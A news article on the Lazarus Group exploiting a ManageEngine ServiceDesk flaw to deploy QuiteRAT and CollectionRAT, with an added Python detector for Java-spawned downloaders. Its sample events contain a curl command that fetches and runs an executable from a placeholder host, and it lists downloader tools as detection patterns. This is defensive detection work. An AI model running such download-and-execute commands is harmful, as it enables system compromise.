North Korean Lazarus APT Group Targets Internet Backbone and Healthcare Organizations in Europe and the US
In a fresh cyber attack, the Lazarus APT group, backed by the North Korean state, has set its sights on internet backbone infrastructure and healthcare organizations located in Europe and the United States. According to a report by Cisco Talos, the hackers exploited a vulnerability in ManageEngine ServiceDesk (CVE-2022-47966) as early as January, only five days after its disclosure.
The attackers used the vulnerability to gain initial access, which allowed them to download and run a malicious binary through the Java runtime process; that binary then launched the implant on the compromised server. The binary used in the attack is a modified version of the Lazarus Group’s MagicRAT malware, now tracked as QuiteRAT.
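The telltale of the initial-access step described above is the ServiceDesk Java process spawning a downloader or a freshly written executable. The following detection logic is an added example, not code from the Talos report or from this article; the Sysmon-style JSON field names, the hostnames, paths and the placeholder URL in the constructed sample events are assumptions.

```python
import json
import ntpath
import re

# Constructed sample: one Sysmon-style process-creation record per line.
# Hosts, paths and the URL are placeholders, not indicators from the report.
SAMPLE_EVENTS = r"""
{"ts":"2023-01-10T08:01:12Z","host":"sdp-01","parent_image":"C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c curl.exe -o C:\\Windows\\Temp\\upd.exe http://placeholder.invalid/upd.exe"}
{"ts":"2023-01-10T08:01:14Z","host":"sdp-01","parent_image":"C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe","image":"C:\\Windows\\Temp\\upd.exe","cmdline":"C:\\Windows\\Temp\\upd.exe"}
{"ts":"2023-01-10T08:05:00Z","host":"sdp-01","parent_image":"C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe","image":"C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe","cmdline":"java.exe -cp lib ReportWorker"}
{"ts":"2023-01-10T08:06:30Z","host":"sdp-01","parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe"}
"""

JAVA_HOSTS = {"java.exe", "javaw.exe"}          # ServiceDesk runs inside the JRE
SHELLS = {"cmd.exe", "powershell.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe", "wget.exe"}
# Directories a web-facing service should never be launching binaries from.
WRITABLE_DIRS = re.compile(r"\\(temp|tmp|appdata|public|programdata)\\", re.IGNORECASE)
URL = re.compile(r"https?://", re.IGNORECASE)


def classify(ev):
    """Return (severity, reason) for one event, or None if it looks benign."""
    parent = ntpath.basename(ev["parent_image"]).lower()
    child = ntpath.basename(ev["image"]).lower()
    if parent not in JAVA_HOSTS:
        return None                                   # only Java-spawned children matter here
    cmd = ev.get("cmdline", "").lower()
    if WRITABLE_DIRS.search(ev["image"]):
        return ("high", f"java spawned binary from writable dir: {ev['image']}")
    if child in SHELLS and (URL.search(cmd) or any(d in cmd for d in DOWNLOADERS)):
        return ("high", f"java spawned {child} performing a download")
    if child in SHELLS | DOWNLOADERS:
        return ("medium", f"java spawned interpreter/downloader {child}")
    return None                                       # e.g. java re-spawning java workers


def detect(events_jsonl):
    """Run classify() over JSON-lines input and collect the alerts."""
    alerts = []
    for line in events_jsonl.strip().splitlines():
        ev = json.loads(line)
        verdict = classify(ev)
        if verdict:
            alerts.append({"ts": ev["ts"], "host": ev["host"],
                           "severity": verdict[0], "reason": verdict[1]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

On the sample, the curl download and the execution from `C:\Windows\Temp` are flagged high while the Java worker re-spawn and the explorer-launched shell are ignored; tune the directory and tool lists to your own ServiceDesk install path and approved admin tooling.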
As part of this campaign, the Lazarus Group has also introduced a new malware named CollectionRAT. It functions as a remote access trojan (RAT) capable of executing arbitrary commands on compromised systems. Security researchers have found a connection between CollectionRAT and Jupiter/EarlyRAT, a previously known malware family associated with the Andariel APT faction, which operates under the Lazarus Group.
Similar to MagicRAT, QuiteRAT is built on the Qt framework, an open-source, cross-platform framework for application development. However, QuiteRAT has a significantly smaller file size, ranging from 4 to 5 MB compared to MagicRAT’s 18 MB. This size difference is due to the Lazarus Group’s decision to include only essential Qt libraries in QuiteRAT, unlike MagicRAT, which incorporated the entire framework.
While MagicRAT has built-in persistence mechanisms through the configuration of scheduled tasks, QuiteRAT lacks inherent persistence functionality. Instead, it relies on instructions from the command-and-control (C2) server for persistence.
This marks the third documented campaign attributed to the Lazarus Group in the early months of 2023. Notably, the group has consistently repurposed the same infrastructure across these operations. Cybersecurity teams are advised to monitor and analyze the threat to prevent infection by QuiteRAT.